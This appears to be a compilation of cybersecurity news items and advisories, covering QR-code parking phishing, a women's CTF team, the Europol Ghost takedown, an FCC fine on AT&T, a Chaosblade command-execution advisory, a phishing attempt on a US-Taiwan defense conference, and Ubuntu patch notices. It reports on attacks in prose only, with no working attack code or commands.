Criminal actors are finding their niche in utilizing QR phishing codes, otherwise known as "quishing," to victimize unsuspecting tourists in Europe and beyond.

Source: Westend61 GmbH via Alamy Stock Photo

In what seems to be an increasingly popular method of attack, two threat groups have been identified as utilizing QR code parking scams in the UK and throughout the world.

The researchers at Netcraft believe that one of the groups is active across Europe, especially in France, Germany, Italy, Switzerland, and the UK. According to initial reports of the threat, threat actors trick unsuspecting victims into scanning malicious QR codes and entering their personal information. And the damage doesn't stop there — ultimately, because the QR codes are fake, users aren't registering their cars for parking, meaning that they're likely to be hit with a double whammy: potential financial fraud and a parking ticket.

The threat first came to public notice in August when British car insurer RAC published a warning advising drivers to be vigilant and only pay with card, cash, or official parking apps already installed on their phones. The potential victim count so far is roughly 10,000 within just a two-month span, according to their report released today.

The scams are gaining so much traction that they're stretching beyond Europe, to Canada and the United States, prompting the FBI to issue alert number I-011822-PSA, "Cybercriminals Tampering with QR Codes to Steal Victim Funds," to bring awareness to an issue they suspect will only continue to grow.

**No-Parking Zone**

In the United Kingdom, it first began with what the researchers called a "wave of malicious QR codes appearing across the city center" of London. The fake QR codes would be found printed on adhesive stickers and posted on parking meters. After scanning the QR code, the user turned victim would be directed to a phishing website impersonating a legitimate parking payment app, PayByPhone.

The scams spread across Britain, and peaked from June to September, with the threat actors were getting traction with, or perhaps specifically targeting, tourists in areas such as Blackpool, Brighton, Portsmouth, Southampton, Conwy, and Aberdeen.

With roughly 30 parking apps currently being used in the UK, these criminals are likely to find success preying on tourists who need to access public parking with easy and accessible payment options. 

And though the current research focuses on how these schemes impact parking and tourists in particular, Robert Duncan, vice president of product strategy at Netcraft, stresses to Dark Reading that the threats carry risk in business context, pointing out a rash of corporate Microsoft 365 "quishing" attempts that exploited corporate users who used their own devices, thus excluding them from the enterprise's security perimeter and leaving them open to any potential threats. 

**PayByQuish?**

One criminal group using these methods is specifically impersonating PayByPhone, and follow a series of steps to execute their scam.

First, the threat actor "deploys boots on the ground resources" to set up the attack and affix the QR codes to parking payment machines, Duncan explains. Next, the victims scan the malicious, fake QR code and are unknowingly directed to a phishing website. The victim then follows the steps to enter their personal details: the parking lot location code, their vehicle details, parking duration, and lastly — and most damaging — their payment-card details.

Once this is completed, the website will display a "processing" page to simulate the legitimate user experience. The payment is then "accepted," and the phishing website confirms the entered details before directing the victim to the real PayByPhone website. 

According to the researchers, in some cases the phishing group sends the victim to a failed payment page, asking them for an alternative payment method. This only exacerbates the issue by collecting more card info and further adding to the funds that the threat actors can steal from.

Evading criminal groups' schemes seems a difficult task when it presents itself so well as a legitimate operation. But the researchers have found that there are certain markers that can help potential victims detect a scam. For instance, 32 domain names with the same scam all displayed the following characteristics:

1.  Registered with NameSilo.
    
2.  Using .info, .click, .live, .online, and .site top-level domains (TLDs) rather than .com or common country-specific TLDs.
    
3.  The sites appeared to be protected by Cloudflare.
    

**How Businesses Can Avoid the Quish Hook**

As these kinds of threat continue to grow, and possibly develop into new business sectors (such as quishing threats infiltrating restaurants or retail stores), Duncan notes that it won't be easy to defend against. 

"It's quite difficult for businesses to defend against rogue QR codes being placed over existing ones," he says. "It's also harder to protect customers using mobile devices who may not have as many built-in security measures as on desktop devices. In this case, an online brand protection platform with broad URL-based threat intelligence with QR code support can help."

Ultimately, Duncan says, there is no foolproof solution to preventing these threats as "both fake and legitimate QR codes often use URL shorteners, which makes it very hard to tell apart." Instead, he recommends that users avoid scanning QR codes and instead look up parking apps in official app stores.

"There's a lot of potential for QR code misuse," he adds. "You're often on a mobile device, where controls can be weaker. Watch this space."

QR Phishing Scams Gain Motorized Momentum in UK

The 12-member group will compete at the first all-women's capture-the-flag competition this November at the Kunoichi Cyber Games in Tokyo.

Source: Dmytro Sidelnikov via Alamy Stock Photo

Do they have what it takes to capture the flag? 

The 12 members of a new cyberteam will find out this fall, when four international teams meet at the Kunoichi Cyber Games to see whose cybersecurity athletes have what it takes to win in an intense cyberskills tournament. These cyber athletes will have to demonstrate their mastery of forensics, Web security, reverse engineering, binary exploitation, and cryptography in competition at the 2024 Code Blue Conference, Nov. 14 to 15, in Tokyo.

The cyber athletes come from across the United States. Some are college students, participating in their first cyber-gaming competitions. Others are cybersecurity professionals, who have been working in the industry. All of them are women. 

The Women's Cyber Team will be officially commissioned at Cybersecurity Career Week, an event sponsored by the House Cybersecurity Caucus, NICE, and SANS, in Washington, DC, on Sept. 19, kicking off the cyber season of competition for the fledgling team.

The US team will take on the teams from Japan, the United Kingdom, and the European Union during the competition. Five members and two substitutes will compete for eight hours in a capture-the-flag (CTF) contest, as well as an attack-and-defense competition. Each team member has a specialty area of focus and a subspecialty. 

**Developing Skills, Confidence**

The team is helmed by cybersecurity gaming veteran Ken Jenkins, CTO of Cymonix. A participant in many CTF and cyber tournaments held over the years, Jenkins was the head coach of the co-ed US Cyber Team in season 2 and the assistant head coach in season 3. The co-ed team is preparing for season 4's international competition later this year in Chile. 

For Jenkins, cyber gaming gives athletes the ability to flex their cyber muscles while developing skills and confidence – without their activities posing a threat to any actual business operations. 

"I think it really helps overcome imposter syndrome. It's also very validating of skills. They help you identify gaps and weaknesses. It also brings you together in a very safe place where you can make mistakes, and it doesn't cause a business outage, he says. "I remember days of defending a network where I did the same 30 things, right? I logged into this system, checked these alerts, did this, analyzed this file. Wash, rinse, repeat, for weeks on end."

Gamers, however, get the ability to reverse engineer a piece of malware or participate in red-team engagements that give them a plethora of new skills that they don’t get to exercise every day. 

**How the Team Came Together**

Choosing the 12 competitors for the team was no easy task, notes Chelsie Cooper, the team's assistant head coach and a senior intelligence analyst at CrowdStrike. 

Around 50 hopeful athletes participated in season IV of the US Cyber Open CTF in June. This initial pool was then culled to a smaller group based on an assessment that included scores from participating in any of the National Cyber League or US Cyber Open competitions. A smaller pool of candidates were interviewed, and their soft skills were as important as their cybersecurity chops, focusing on leadership and communication skills. 

"All of that came together in a very, very, very hard decision to only pick 12 of them because of all of them, they are very talented – well beyond their years," Cooper says. "They are going places."

Cooper's role as assistant head coach isn't to motivate the team, she says, because they're already incredibly driven. Rather, the focus is on strengthening existing skills and identifying knowledge and skills gaps.

"It's more so of a mentoring opportunity for us than it is anything else because they have the talent and they have the drive," she says. "We're just there to help guide them along the way to the competition."

Leading up to the November competition, the team has been holding biweekly virtual office hours with the coaches, discussing logistics and working on competition skills. Each team member also has a buddy. The older, more experienced players who have competition experience are mentoring younger members to bolster their weak spots and build confidence. 

**Building a Talent Pipeline**

While the co-ed US Cyber Team is for players ages 18 to 25, this new team recruited women ages 18 to 29 for the first year in an effort to build a pipeline of experienced women who could serve as coaches and mentors for future teams, says US Cyber Games Commissioner Jessica Gulick.

"In our field, with cyber games, even though you know cybersecurity and you're a cybersecurity professional, it doesn't automatically make you a good player for the game," Gulick says. "So having that experience is incredibly valuable."

The US Cyber Games program is in its fourth year; the co-ed team has 30 athletes, three of whom are women. Two of those women are also on the US Women's Cyber Team, including Shiloh Smiles, 24, a graduate of The Citadel in Charleston, SC. Smiles is pursuing a graduate degree in computer and electrical engineering at George Mason University, while also working as a penetration tester for the US Navy. 

For Smiles, the women's cybersecurity team offers a unique opportunity to combine a skill-building competition with social ambassadorship – and a way to make friends who share a common interest and will face some of the same workplace challenges. Women make up less than a quarter of the cybersecurity workforce. 

"Working in the military community, there are not many women, so it's very rare that I meet another woman who is technical," Smiles says. "That's been the best part of the team so far – to meet 11 other women who are highly technical. I just think it is super-duper cool. And we have the upcoming competition in November, which is going to be an all-women competition. So that's another opportunity to meet women from all over the world that are, again, highly technical. That's definitely what I'm most excited for – the networking in the community."

For 19-year-old Sarah Ogden, a student at Northern Kentucky University and one of the team's younger athletes, the opportunity to learn and develop her cybersecurity skills has been a motivating factor. She had participated in CTFs in the past, so she jumped at the chance to join the team – and travel internationally. Ogden says she is looking forward to checking out the variety of vending machines in Tokyo, but when it comes to the games itself, she is keeping her expectations in check.

"What I'm most looking forward to is trying to learn as much as I can," Ogden says. "I feel like my expectations are kind of low, so I'm not trying to stress myself out too much, just doing our best."

Head coach Jenkins would love for his team to come in first place in Tokyo, but winning isn't the only focus.

"We're really more focused on bringing the countries together, bringing the women together, having them share their experiences," Jenkins says. "I used to be dead-set on, 'We have to win, right?' But it's not the only thing that matters in this inaugural year."

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

Ready to Rumble: US Women's Cyber Team Preps for Global CTF Contest

Europol, alongside global law enforcement, dismantled the encrypted chat app Ghost, widely used by criminal networks for drug…

Europol, alongside global law enforcement, dismantled the encrypted chat app Ghost, widely used by criminal networks for drug trafficking, money laundering, and violent crime. The operation led to 51 arrests and key seizures.

Europol, Eurojust, and law enforcement agencies from nine countries have dismantled an encrypted communication platform, dubbed Ghost, which was being exploited by criminal networks around the world to facilitate large-scale illicit activities.

Ghost, designed with high-level encryption, had become a go-to tool for organised crime, enabling drug trafficking, money laundering, and even violent offences while evading law enforcement.

Renowned for its multiple encryption standards and self-destructing messaging feature, Ghost allowed criminal networks to communicate securely and evade detection. Authorities revealed that thousands of users globally were relying on Ghost for illegal operations, with nearly 1,000 encrypted messages exchanged daily on the platform.

****Major Arrests and Seizures****

The operation, which included coordinated raids and technical interventions, resulted in 51 arrests. Most of the suspects were detained in Australia, with 38 individuals apprehended, followed by 11 arrests in Ireland. Key suspects were also captured in Canada and Italy, with the latter involving members of the notorious Italian Sacra Corona Unita mafia.

Devices seized in the operation – Image: Europol

In addition to the arrests, a major drug lab was dismantled in Australia, and law enforcement seized weapons, drugs, and over €1 million in cash globally. Europol confirmed that several threats to life were thwarted during the operation, which is expected to lead to further arrests as investigations continue.

****A Global Coordinated Effort****

In a press release, Europol’s Executive Director, Catherine De Bolle, emphasized the importance of international collaboration in dismantling such sophisticated networks. “Today, we have made it clear that no matter how hidden criminal networks think they are, they cannot evade our collective effort,” De Bolle stated, praising the cooperation between nine nations and Europol in taking down Ghost.

The platform’s infrastructure was spread across several countries, with servers located in France and Iceland, owners traced to Australia, and financial assets linked to the U.S. The multinational taskforce established in March 2022, which involved countries such as Australia, Canada, France, and the United States, played a key role in identifying the suppliers and users of Ghost.

****EncroChat, Anom and Ghost****

In a similar move, Europol and related authorities successfully seized the European encrypted communication provider EncroChat in 2023, following a major takedown of the platform in 2020. The dismantling of EncroChat, which had been widely used by criminal networks for coordinating illegal activities, led to the arrests of hundreds of suspects across Europe.

In a similar operation in 2018, the Federal Bureau of Investigation (FBI) took control of the encrypted communications company Anom, known to users as the Anom app, while it was still in its infancy. The FBI transformed it into a large-scale honeypot, which ultimately led to the arrest of over 800 criminals in 2021.

Both proved crucial in disrupting organised crime, setting a precedent for the recent Ghost takedown and demonstrating Europol’s ongoing commitment to targeting encrypted communication systems exploited by criminals.

****International Cooperation****

This operation was supported by a Joint Investigation Team (JIT) between the U.S. and French authorities, alongside contributions from law enforcement in Australia, Canada, Ireland, Italy, the Netherlands, Sweden, and Iceland. Europol’s headquarters played a key role in coordinating the multi-country raids, deploying experts across Iceland, Ireland, and Australia.

As investigations continue, this operation signals a major victory for law enforcement agencies worldwide in their ongoing battle against organised crime. Yet, the dismantling of Ghost is only the latest chapter in an ongoing fight against encrypted tools that allow criminal organisations to operate in the shadows.

1.  **Europe’s largest known illegal IPTV op dismantled by police**
2.  **Europol takes down VPNLab used by ransomware operators**
3.  **Europol nabs 106 criminals involved in SIM swapping scams**
4.  **Europol Busts Major Online CSAM Racket in Western Balkans**
5.  **Telegram Founder Pavel Durov Reportedly Arrested in France**

Global Crime Hit as Europol Shuts Down Encrypted Chat App Ghost

Regulators fine AT&T $13 million for failing to protect customer information held by a third-party vendor, and extend consumer data protections to the cloud.

Source: B Christopher via Alamy Stock Photo

The Federal Communications Commission fined AT&T $13 million and ordered it to tighten up its privacy and security practices in the wake of a catastrophic third-party compromise.

The commission also used its authority under the Communications Act of 1934 to extend consumer protections to the cloud, finding AT&T failed to maintain proper oversight of a third-party provider.

That vendor, data warehousing provider Snowflake, reportedly was compromised in January 2023, exposing a host of organizations' sensitive data, among them AT&T's. In the weeks that followed the breach, AT&T acknowledged "nearly all" its customers were affected by exfiltrated call and text records, phone numbers, and other personally identifiable information.

Following an investigation, the FCC ruled on Sept. 16 that Snowflake should have been required to "destroy or return" the information years prior to the incident, and finding AT&T responsible for failing to appropriately protect its customer data.

"The Commission expects carriers to meet the requirement of the \[Communications Act of 1934\] and the Commission's rules, including to take 'every reasonable precaution' to protect customers' proprietary or personal information," the agency said in its ruling. "That includes reasonable practices as they relate to cloud security, data retention, and disposal."

In addition to the fine, the FCC ordered AT&T to improve its overall information security controls and practices, including "multifaceted vendor controls and oversight."

**About the Author**

FCC: AT&amp;T Didn't Adequately Protect Customers' Cloud Data

exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-723h-x37g-f8qm: Chaosblade vulnerable to OS command execution

Hackers sent a convincing lure document, but after 20 years of similar attacks, the target organization was well prepared.

Source: elifbayraktar via Alamy Stock Photo

A meeting of influential figures in and around the US and Taiwanese defense industries has been targeted by a phishing attack carrying fileless malware.

The 23rd US-Taiwan Defense Industry Conference will be held next week in Philadelphia's Logan Square neighborhood. Closed to the press, it will feature speakers from government, defense, academia, and commercial sectors in the US and Taiwan. The focus, according to its website, will be "addressing the future of US defense cooperation with Taiwan, the defense procurement process, and Taiwan's defense and national security needs."

Recently, the US-Taiwan Business Council — the organization behind the event — was sent a malicious forgery of its own registration form. The form was paired with information-stealing malware designed to execute entirely in memory, making it more difficult to detect with traditional antivirus software. Thanks to diligent anti-phishing preparations, however, the council quickly rebuffed the attack.

**Threats to a Taiwan Defense Conference**

Eight years ago, a Chinese phishing email was sent to members of Taiwan's defense industry, including some attendees of the 15th US-Taiwan Defense Industry Conference. Even by then, though, it was old hat.

"In the period from 2003 to 2011, we were heavily targeted with spear-phishing emails constantly," reports Lotta Danielsson, vice president of the US-Taiwan Business Council. "There was an uptick in 2016-2017, but it has been very quiet for the last several years. Usually, it increases in the leadup to and right after the annual defense conference, then it subsides again."

In the leadup to this year's conference, rather than attendees, the attack seemed to target the council itself. It came in an email, from an individual posing as a potential attendee. Rather than use the event's online form, the impersonator sent a filled out copy of the registration form as a PDF, which attendees can do if they experience technical issues with the site.

Source: Cyble

The document, according to analysis from Cyble, came with a ZIP file that was supposed to drop a malicious Windows shortcut (LNK) file. If opened, the LNK would have established persistence on its targeted machine by placing an executable file in the Windows startup folder. Upon reboot, the executable would download additional payloads to be executed directly in the machine's memory, without saving any files to disk. Ultimately, the malware could exfiltrate data back to an attacker-controlled server through Web requests designed to blend with normal network traffic.

Cyble researchers were unable to tie the attack to any specific threat actor. They noted, however, that Chinese entities in particular have a long history of targeting Taiwan.

"We've seen very clearly in the last few years that there are a lot of problems in East Asian geopolitics — military-related movements in the South China Sea, very sharp comments coming from Taiwan and China. And it looks like nation states are interested in US-Taiwan defense cooperation," says Kaustubh Medhe, head of research and intelligence for Cyble.

This latest phishing attempt fits neatly into that picture. "We have a strong suspicion that this could be used as a stealthy technique to perform long-term surveillance of people with a specific interest in this particular topic," he says.

**A Textbook Case of How to Prevent Phishing**

As Danielsson recalls, "We have been targeted by these types of spear phishing emails for a long time — more than 20 years — so we flagged it as suspicious right away. We did not open the file. Instead, we submitted it to VirusTotal and confirmed that it was malicious. Then we deleted it, and that was pretty much it."

She highlights a few keys to success that have helped the Council easily swat away its many phishing attacks over the years. "One is educational, so the entire staff is well educated on these types of attacks. Nobody clicks links in emails, or opens documents sent via email, unless we have talked to people directly and are expecting them. Even then, we often scan them before opening, unless the presumed content is very sensitive, in which case we will call people to double-check that they sent them," she says.

Besides that, she adds, "We keep our email clients text-only so it's easy to see any obfuscation of links right away. I log all traffic in and out of our system and keep an eye out for anomalies. We also take our entire system offline at night and on weekends, air-gapping our computers and internal IT systems. This is doable because we are a small office with three people, something that might be harder for a larger organization. I also have some relationships with people who work in the cybersecurity industry, and they have helped us think through what to do if we do end up failing to prevent an issue. We want to be prepared if it does."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Phishing Espionage Attack Targets US-Taiwan Defense Conference

Ubuntu Security Notice 6885-3 - USN-6885-1 fixed several vulnerabilities in Apache. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Orange Tsai discovered that the Apache HTTP Server mod_rewrite module incorrectly handled certain substitutions. A remote attacker could possibly use this issue to execute scripts in directories not directly reachable by any URL, or cause a denial of service. Some environments may require using the new UnsafeAllow3F flag to handle unsafe substitutions.

    ==========================================================================Ubuntu Security Notice USN-6885-3September 18, 2024apache2 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Several security issues were fixed in Apache HTTP Server.Software Description:- apache2: Apache HTTP serverDetails:USN-6885-1 fixed several vulnerabilities in Apache. This update providesthe corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.Original advisory details: Orange Tsai discovered that the Apache HTTP Server mod_rewrite module incorrectly handled certain substitutions. A remote attacker could possibly use this issue to execute scripts in directories not directly reachable by any URL, or cause a denial of service. Some environments may require using the new UnsafeAllow3F flag to handle unsafe substitutions. (CVE-2024-38474, CVE-2024-38475) Orange Tsai discovered that the Apache HTTP Server incorrectly handled certain response headers. A remote attacker could possibly use this issue to obtain sensitive information, execute local scripts, or perform SSRF attacks. (CVE-2024-38476) Orange Tsai discovered that the Apache HTTP Server mod_proxy module incorrectly handled certain requests. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. (CVE-2024-38477)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  apache2                         2.4.29-1ubuntu4.27+esm3                                  Available with Ubuntu ProUbuntu 16.04 LTS  apache2                         2.4.18-2ubuntu3.17+esm13                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6885-3  https://ubuntu.com/security/notices/USN-6885-2  https://ubuntu.com/security/notices/USN-6885-1  CVE-2024-38474, CVE-2024-38475, CVE-2024-38476, CVE-2024-38477

Ubuntu Security Notice USN-6885-3

Ubuntu Security Notice 7021-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7021-1September 18, 2024linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15,linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15,linux-hwe-5.15, linux-ibm, linux-intel-iotg, linux-intel-iotg-5.15,linux-kvm, linux-nvidia, linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-intel-iotg-5.15: Linux kernel for Intel IoT platformsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - BTRFS file system;  - F2FS file system;  - GFS2 file system;  - BPF subsystem;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2024-39496, CVE-2024-41009, CVE-2024-26677, CVE-2024-42160,CVE-2024-27012, CVE-2024-42228, CVE-2024-39494, CVE-2024-38570)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1053-gkeop   5.15.0-1053.60  linux-image-5.15.0-1063-ibm     5.15.0-1063.66  linux-image-5.15.0-1063-raspi   5.15.0-1063.66  linux-image-5.15.0-1065-intel-iotg  5.15.0-1065.71  linux-image-5.15.0-1065-nvidia  5.15.0-1065.66  linux-image-5.15.0-1065-nvidia-lowlatency  5.15.0-1065.66  linux-image-5.15.0-1067-gke     5.15.0-1067.73  linux-image-5.15.0-1067-kvm     5.15.0-1067.72  linux-image-5.15.0-1068-oracle  5.15.0-1068.74  linux-image-5.15.0-1069-gcp     5.15.0-1069.77  linux-image-5.15.0-1070-aws     5.15.0-1070.76  linux-image-5.15.0-1073-azure   5.15.0-1073.82  linux-image-5.15.0-122-generic  5.15.0-122.132  linux-image-5.15.0-122-generic-64k  5.15.0-122.132  linux-image-5.15.0-122-generic-lpae  5.15.0-122.132  linux-image-aws-lts-22.04       5.15.0.1070.70  linux-image-azure-lts-22.04     5.15.0.1073.71  linux-image-gcp-lts-22.04       5.15.0.1069.65  linux-image-generic             5.15.0.122.122  linux-image-generic-64k         5.15.0.122.122  linux-image-generic-lpae        5.15.0.122.122  linux-image-gke                 5.15.0.1067.66  linux-image-gke-5.15            5.15.0.1067.66  linux-image-gkeop               5.15.0.1053.52  linux-image-gkeop-5.15          5.15.0.1053.52  linux-image-ibm                 5.15.0.1063.59  linux-image-intel-iotg          5.15.0.1065.65  linux-image-kvm                 5.15.0.1067.63  linux-image-nvidia              5.15.0.1065.65  linux-image-nvidia-lowlatency   5.15.0.1065.65  linux-image-oracle-lts-22.04    5.15.0.1068.64  linux-image-raspi               5.15.0.1063.61  linux-image-raspi-nolpae        5.15.0.1063.61  linux-image-virtual             5.15.0.122.122Ubuntu 20.04 LTS  linux-image-5.15.0-1053-gkeop   5.15.0-1053.60~20.04.1  linux-image-5.15.0-1065-intel-iotg  5.15.0-1065.71~20.04.1  linux-image-5.15.0-1069-gcp     5.15.0-1069.77~20.04.1  linux-image-5.15.0-1070-aws     5.15.0-1070.76~20.04.1  linux-image-5.15.0-1073-azure   5.15.0-1073.82~20.04.1  linux-image-5.15.0-122-generic  5.15.0-122.132~20.04.1  linux-image-5.15.0-122-generic-64k  5.15.0-122.132~20.04.1  linux-image-5.15.0-122-generic-lpae  5.15.0-122.132~20.04.1  linux-image-aws                 5.15.0.1070.76~20.04.1  linux-image-azure               5.15.0.1073.82~20.04.1  linux-image-azure-cvm           5.15.0.1073.82~20.04.1  linux-image-gcp                 5.15.0.1069.77~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.122.132~20.04.1  linux-image-generic-hwe-20.04   5.15.0.122.132~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.122.132~20.04.1  linux-image-gkeop-5.15          5.15.0.1053.60~20.04.1  linux-image-intel               5.15.0.1065.71~20.04.1  linux-image-intel-iotg          5.15.0.1065.71~20.04.1  linux-image-oem-20.04           5.15.0.122.132~20.04.1  linux-image-oem-20.04b          5.15.0.122.132~20.04.1  linux-image-oem-20.04c          5.15.0.122.132~20.04.1  linux-image-oem-20.04d          5.15.0.122.132~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.122.132~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7021-1  CVE-2024-26677, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-39496, CVE-2024-41009, CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-122.132  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1070.76  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1073.82  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1069.77  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1067.73  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1053.60  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1063.66  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1065.71  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1067.72  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1065.66  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1068.74  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1063.66  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1070.76~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1073.82~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1069.77~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1053.60~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-122.132~20.04.1  https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1065.71~20.04.1

Ubuntu Security Notice USN-7021-1

Ubuntu Security Notice 7020-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

